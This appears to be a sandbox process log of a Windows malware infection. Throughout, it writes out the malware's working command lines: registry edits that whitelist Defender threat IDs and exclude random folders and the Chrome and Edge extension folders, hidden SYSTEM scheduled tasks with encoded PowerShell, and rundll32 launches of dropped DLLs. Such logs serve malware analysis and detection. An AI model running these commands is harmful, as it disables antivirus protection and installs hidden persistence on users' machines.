"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\dbuslf')
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXFglHWZD" /SC once /ST 12:00:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXFglHWZD"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4580 /prefetch:8
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXFglHWZD"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 19:37:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe\" 0c /qdotdidNb 385118 /S" /V1 /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe 0c /qdotdidNb 385118 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5648 -ip 5648
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 836
C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\BRLoOE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\WCXnYbS.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ucrVpivlTlXwlAC"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\vNnVqYX.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\sajTEfs.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\QTCNSRy.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\RLRPNdC.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 08:47:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\YoUqjagI\xuYtYBv.dll\",#1 /ROMbdidSQ 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\YoUqjagI\xuYtYBv.dll",#1 /ROMbdidSQ 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\YoUqjagI\xuYtYBv.dll",#1 /ROMbdidSQ 385118
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "hhewb1" /SC once /ST 02:51:13 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "hhewb1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb09ff3cb8,0x7ffb09ff3cc8,0x7ffb09ff3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,11682117231295200583,1752094053012541538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
